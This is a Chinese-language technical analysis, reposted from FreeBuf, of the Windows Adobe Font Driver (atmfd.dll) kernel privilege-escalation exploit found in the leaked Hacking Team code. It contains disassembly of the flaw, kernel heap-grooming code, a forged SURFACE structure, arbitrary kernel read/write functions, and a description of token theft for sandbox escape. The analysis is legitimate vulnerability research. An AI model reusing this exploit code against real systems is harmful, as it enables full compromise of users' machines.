Hacking Team攻击代码分析Part 3 : Adobe Font Driver内核驱动权限提升漏洞

暗月博客 2019年11月21日22:13:14评论384 views字数 9258阅读30分51秒阅读模式
摘要

前言 今天上午共享了我们针对Hacking Team泄露的 Flash 0day漏洞的技术分析,为了在IE和Chrome上绕过其沙盒机制完全控制用户系统,Hacking Team还利用了一个Windows中的内核驱动: Adobe Font Driver(atmfd.dll)中存在的一处字体0day漏洞,实现权限提升并绕过沙盒机制。

前言

今天上午共享了我们针对Hacking Team泄露的 Flash 0day漏洞的技术分析,为了在IE和Chrome上绕过其沙盒机制完全控制用户系统,Hacking Team还利用了一个Windows中的内核驱动: Adobe Font Driver(atmfd.dll)中存在的一处字体0day漏洞,实现权限提升并绕过沙盒机制。

该0day漏洞可以用于WindowsXP~Windows 8.1系统,X86和X64平台都受影响,在Hacking Team泄露的源码中我们发现了该漏洞的详细利用代码。在利用Flash漏洞获得远程代码执行权限后,Hacking Team经过复杂的内核堆操作准备后,加载一个畸形的OTF字体文件,再调用Atmfd中的相关接口触发处理字体文件过程的漏洞,最后获得任意次数的任意 内核地址读写权限,接着复制Explorer.exe的token到当前进程,并清除本进程的Job来实现沙盒逃逸。

Chrome 43版本以上默认对沙盒内进程使用DisallowWin32k机制关闭了所有win32k相关调用,因此不受这个漏洞的影响。

下面是该漏洞的具体分析,本文分析来自360Vulcan Team的pgboy:

1. 漏洞分析

通过分析漏洞利用的源码我们看到,该漏洞在加载字体完成后利用NamedEscape函数的0×2514命令来触发关键操作
通过跟踪NamedEscape我们可以找到存在于atmfd.dll里面漏洞点:

以下是笔者测试机器上atmfd的版本(win7 32bit):

kd> lmvm atmfd start end module name 95250000 9529e000 ATMFD (no symbols)  Loaded symbol image file: ATMFD.DLL Image path: /SystemRoot/System32/ATMFD.DLL Image name: ATMFD.DLL Timestamp: Fri Feb 20 11:09:14 2015 (54E6A55A) CheckSum: 00057316 ImageSize: 0004E000 File version: 5.1.2.241 Product version: 5.1.2.241 File flags: 0 (Mask 3F) File OS: 40004 NT Win32 File type: 3.0 Driver File date: 00000000.00000000 Translations: 0409.04b0 CompanyName: Adobe Systems Incorporated ProductName: Adobe Type Manager InternalName: ATMFD OriginalFilename: ATMFD.DLL ProductVersion: 5.1 Build 241 FileVersion: 5.1 Build 241 FileDescription: Windows NT OpenType/Type 1 Font Driver LegalCopyright: ©1983-1990, 1993-2004 Adobe Systems Inc.

相关触发漏洞的callback代码如下:

.text:00011EC6 WriteCallback proc near ; DATA XREF: sub_125D0+66?o .text:00011EC6 .text:00011EC6 ms_exc = CPPEH_RECORD ptr -18h .text:00011EC6 arg_4 = word ptr 0Ch .text:00011EC6 arg_8 = word ptr 10h .text:00011EC6 arg_C = dword ptr 14h .text:00011EC6 .text:00011EC6 push 8 .text:00011EC8 push offset stru_4CF60 .text:00011ECD call __SEH_prolog4 .text:00011ED2 and [ebp+ms_exc.registration.TryLevel], 0 .text:00011ED6 movsx eax, [ebp+arg_8] ;参数是一个有符号的WORD,这里在扩展的时候会直接变成负数 .text:00011EDA mov ecx, [ebp+arg_C] .text:00011EDD movzx edx, word ptr [ecx+4] .text:00011EE1 cmp eax, edx .text:00011EE3 jge short loc_11EEE .text:00011EE5 mov dx, [ebp+arg_4] .text:00011EE9 mov [ecx+eax*2+6], dx .text:00011EEE .text:00011EEE loc_11EEE:  .text:00011EEE mov [ebp+ms_exc.registration.TryLevel], 0FFFFFFFEh .text:00011EF5 call loc_11F04  .text:00011EFA ; --------------------------------------------------------------------------- .text:00011EFA .text:00011EFA loc_11EFA:  .text:00011EFA xor eax, eax .text:00011EFC call __SEH_epilog4 .text:00011F01 retn 10h

F5之后的callback代码

int __stdcall WriteCallback(int a1, __int16 a2, __int16 a3, int a4) { if ( a3 < (signed int)*(_WORD *)(a4 + 4) )    *(_WORD *)(a4 + 2 * a3 + 6) = a2; return 0; }

这个Callback被外层函数循环调用写入缓存:

.text:0002A028 loc_2A028: ; CODE XREF: xxxEnumCharset+E7?j .text:0002A028 push [ebp+InBuffer] .text:0002A02B movzx eax, si .text:0002A02E push eax .text:0002A02F push eax .text:0002A030 lea eax, [ebp+var_1C] .text:0002A033 push eax .text:0002A034 push [ebp+var_4] .text:0002A037 call [ebp+arg_0] .text:0002A03A movzx eax, ax .text:0002A03D push eax .text:0002A03E push 0 .text:0002A040 call [ebp+callback] ; 调用触发漏洞的回调函数,将Charset写入到InBuffer中 .text:0002A043 movzx eax, word ptr [edi+5Ch] .text:0002A047 inc esi .text:0002A048 cmp esi, eax .text:0002A04A jb short loc_2A028

我们可以看到,这里参数a3是一个有符号的16位数,当a3>0×8000的时候,movsx会将其扩展成0xffff8xxx,因此下面的写操作就变成了堆上溢,会往给出的缓存地址的前面写入。这是一个典型的由于符号溢出引发的堆上溢漏洞。

了解了漏洞的原理后,我们来继续分析OTF文件是如何触发该问题的,通过调试结合Adobe的文档我们可以知道,是在处理OTF文件中CFF表的Charset过程引发的问题。

我们可以通过T2F Analyzer来观察这个被加载的OTF字体文件的格式。见下图:

Hacking Team攻击代码分析Part 3 : Adobe Font Driver内核驱动权限提升漏洞

显而易见,样本OTF文件中构造了超长的Charset,然后通过NamedEscape函数的0×2514命令来获取Charset的时候,就会触发到上面描述的触发点,引发符号溢出。

2.漏洞利用

我们从头再看一下漏洞利用的流程,整个流程主要分这么几个部分:

1. 找到内核字体对象的地址

由于内核字体内存的布局无法直接被Ring3代码探知,利用代码中使用了一个特殊的技巧来实现获得内核字体对象的地址,在利用代码中,先加载字体, 然后立刻创建一个Bitmap对象,再连续多次加载这个字体,由于win32k和atmfd中共用了内存堆处理函数,因此会导致Bitmap对象和字体对 象是正好相邻的。

由于Bitmap这类user/gdi对象的实际内核地址可以通过映射到Ring3的GdiSharedHandleTable获得,因此这样也就可以间接获得攻击代码加载到内核的字体对象的范围。
最 后,由于NamedEscape函数调用atmfd设备的0x250A号命令可以指定对象的地址,并校验字体对象的有效性同时将字体对象读出来,因此攻击 代码结合Bitmap定位和NamedEscape的0x250a指令,就可以准确获取字体对象的地址,相关的代码如下:

while (found == 0) { unsigned char fontloaded = 0; for (j = 0; j < 15; j++) { tmp[0] = 0; fhandle = lpTable->fpAddFontMemResourceEx(lpTable->lpLoaderConfig->foofont, sizeof(lpTable->lpLoaderConfig->foofont), 0, &tmp[0]); if (fhandle){ fontloaded = 1; } } if (fontloaded == 0) { return -1; } if (lpTable->locals->is64) j = (unsigned int)lpTable->fpCreateBitmap(smallbitmapw64, smallbitmaph64, 1, 32, buf64); else j = (unsigned int)lpTable->fpCreateBitmap(smallbitmapw32, smallbitmaph32, 1, 32, buf32); if (lpTable->locals->is64) { tmp[0] = handleaddr64low(j); tmp[1] = handleaddr64high(j); } else tmp[0] = handleaddr(j); min = tmp[0] - 0x4000; max = tmp[0] + 0x4000; for (j = 0; j < 15; j++) { tmp[0] = 0; lpTable->fpAddFontMemResourceEx(lpTable->lpLoaderConfig->foofont, sizeof(lpTable->lpLoaderConfig->foofont), 0, &tmp[0]); } for (i = min; i < max; i += 8) { int ret; *(unsigned int*)inbuf = i; if (lpTable->locals->is64) *(unsigned int*)(inbuf + 4) = tmp[1]; __MEMSET__(outbuf, 0, sizeof(outbuf)); //call an internal atmfd.dll function which receives a kernel font object as input and validates it //also returning data that identifies the font if (lpTable->locals->is64) { ret = NamedEscape(NULL, wcAtmfd, 0x250A, 0x10, inbuf, 0x10, outbuf); }else { ret = NamedEscape(NULL, wcAtmfd, 0x250A, 0x0C, inbuf, 0x0C, outbuf); } if (ret != 0xFFFFFF21) { char *p; if (lpTable->locals->is64) p = outbuf + 8; else p = outbuf + 4; if (__MEMCMP__(p, lpTable->lpLoaderConfig->strFontEgg, 8) == 0) { found = 1; break; } } } }

2. 触发漏洞,实现写入Bitmap对象

攻击代码首先会分配多个0xb000大小的对象,然后找到9个相邻的Bitmap对象并释放中间的3个,这样就在内核win32k堆内存中留下了 0xb000*3= 0×21000大小的空洞,接着攻击代码调用NameDEscape-atmfd的0×2514号命令来读取超长的Charset,触发漏洞。

在这个NamedEscape调用到atmfd过程中,会分配内核对象来复制一份输入的缓存,这里攻击代码将输入的缓存大小设置为0×20005,由于页对齐的原因,这里正好可以占住上面我们说到的0×21000大小的空洞内存。

这样在最终符号溢出时,就会写入到这块Buffer上面未被释放的Bitmap对象中,这就通过精确地堆操作完成了将这个符号溢出导致的缓存上溢转换到对已控制的Bitmap对象的写入。

这个转化的流程如下图所示:

Hacking Team攻击代码分析Part 3 : Adobe Font Driver内核驱动权限提升漏洞

3. 将Bitmap写入转换为内核任意地址读写

在第2步我们讲到这里可以通过操作字体接口,将OTF文件的Charset处理的符号溢出漏洞转换为覆盖Bitmap对象内存的操作,这里我们来看看Bitmap对象在win32k中是如何组织的:它实际是一个 SURFACE对象,结构如下:

typedef struct { unsigned int handle0; unsigned int unk0[4]; unsigned int handle1; unsigned int unk1[2]; unsigned int width; unsigned int height; unsigned int size; unsigned int address0; unsigned int address1; unsigned int scansize; unsigned int unk2; unsigned int bmpformat; unsigned int surftype; unsigned int unk3; unsigned int surflags; unsigned int unk4[12]; } SURFACE;

其中,Address0其实是指向Bitmap中BitsBuffer的指针,我们可以通过SetBitmapBits函数来操作 BitsBuffer指向的内存,可以写入bitmap对象的SURFACE内核结构后,攻击代码就可以通过控制Address0来实现任意地址读写。

在攻击代码中,使用了两个Bitmap对象,一个Bitmap用来控制读写地址,另一个Bitmap2用来进行实际读写,我们将Bitmap2作为 读写地址控制器,将其pBitsBuffer指向实现实际读写的Bitmap的pBitsBuffer的地址,这样就可以实现多次稳定的任意地址读写。

也就是说,我们通过对Bitmap2进行 SetBitmapBits,设置实际读写的 Bitmap的pBitsBuffer为我们想要读写的地址,然后就可以通过进行实际读写的Bitmap的GetBitmapBits和 SetBitmapBits来实现对指定地址的读写了,如图所示:

Hacking Team攻击代码分析Part 3 : Adobe Font Driver内核驱动权限提升漏洞

我们看到,在攻击代码中,首先创建了一个假的Bitmap对象,然后将这个对象写到字体的Charset中:

surf32.width = largebitmapw; surf32.height = largebitmaph; surf32.size = surf32.width*surf32.height * 4; //point to hBitmap SURFACE->address0, which contains the kernel address of bitmap data surf32.address0 = surf32.address1 = handleaddr(lpTable->locals->hBitmap) + 0x2C; surf32.scansize = surf32.width * 4; surf32.bmpformat = 0x6; //BMF_32BPP surf32.surftype = 0x00010000; //STYPE_DEVICE surf32.surflags = 0x04800000; //API_BITMAP | HOOK_TEXTOUT //write to the OTF data loaded from font.h for (i = 0; i < sizeof(surf32); i += 2) { unsigned short tmp = *(unsigned short*)((unsigned int)&surf32 + i); *(unsigned short*)(lpTable->lpLoaderConfig->foofont + 0x16DF3 + i) = lpTable->fpHtons(tmp); }

上面的攻击代码中,则将这个假的Bitmap对象的address0,也就是pBitsBuffer设置成了进行实际读写的bitmap的pBitsBuffer的地址。所以这个假的Bitmap对象就是我们上面提到的控制读写地址的Bitmap2。

最后下面就是完整的利用这个方式实现的任意内核地址的读(arbread)和写(arbwrite)代码:

unsigned int arbread(PVTABLE lpTable, unsigned int addrl, unsigned int addrh) { unsigned int tmp[4];// = {0,0,0,0}; __MEMSET__(tmp, 0, 4); if (lpTable->locals->is64) { tmp[0] = tmp[2] = addrl; tmp[1] = tmp[3] = addrh; lpTable->fpSetBitmapBits(lpTable->locals->thehandle, sizeof(tmp), &tmp); lpTable->fpGetBitmapBits(lpTable->locals->hBitmap, sizeof(tmp[0]), &tmp[0]); } else { tmp[0] = tmp[1] = addrl; lpTable->fpSetBitmapBits(lpTable->locals->thehandle, 8, &tmp); lpTable->fpGetBitmapBits(lpTable->locals->hBitmap, sizeof(tmp[0]), &tmp[0]); } return tmp[0]; } // ported unsigned int arbwrite(PVTABLE lpTable, unsigned int addrl, unsigned int addrh, unsigned int value0, unsigned int value1) { unsigned int tmp[4]; // = {0,0,0,0}; __MEMSET__(tmp, 0, 4); if (lpTable->locals->is64) { tmp[0] = tmp[2] = addrl; tmp[1] = tmp[3] = addrh; lpTable->fpSetBitmapBits(lpTable->locals->thehandle, sizeof(tmp), &tmp); tmp[0] = value0; tmp[1] = value1; lpTable->fpSetBitmapBits(lpTable->locals->hBitmap, 8, &tmp[0]); } else { tmp[0] = tmp[1] = addrl; lpTable->fpSetBitmapBits(lpTable->locals->thehandle, 8, &tmp); tmp[0] = value0; lpTable->fpSetBitmapBits(lpTable->locals->hBitmap, sizeof(tmp[0]), &tmp[0]); } return tmp[0]; }

3.修复内核堆

由于漏洞是在上溢过程中进行的对前一个对象写入,必然会对内核堆造成破坏,所以必须要修复内核堆的结构,这样才能实现在进程退出,对象被释放时不会造成系统蓝屏崩溃,详细的修复代码可以参考源码中触发利用点之后的操作,篇幅关系就不在这里完全列出了。

4.实现权限提升

在实现了内核任意地址写入功能后,权限提升过程就比较简单了,攻击代码通过遍历内核进程表找到explore.exe的进程token,直接将 explore的token对象的地址写入到当前进程的token中,并清除进程的Job对象,来实现最终完全绕过各类沙盒的保护功能。

由于权限提升过程中完全使用了DKOM的方式,没有进行内核代码执行,因此也绕过了Windows8以上系统中的SMEP内核保护功能。

我们在分析这个漏洞的过程中,发现目前Hacking Team版本的漏洞利用代码还是存在一些问题的,由于最终的提权代码直接从Explore复制的token对象,会导致该token对象的引用计数出现问 题,当系统关机、注销,或者Explore.exe异常结束,最终导致Explore.exe进程退出时,可能会导致引用错误的token对象,引发系统 蓝屏崩溃,这是这个利用不够优美的地方。

*本文作者:360Vulcan Team的pgboy,转载须注明来自FreeBuf黑客与极客(FreeBuf.COM)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日22:13:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Hacking Team攻击代码分析Part 3 : Adobe Font Driver内核驱动权限提升漏洞http://cn-sec.com/archives/72591.html

发表评论

匿名网友 填写信息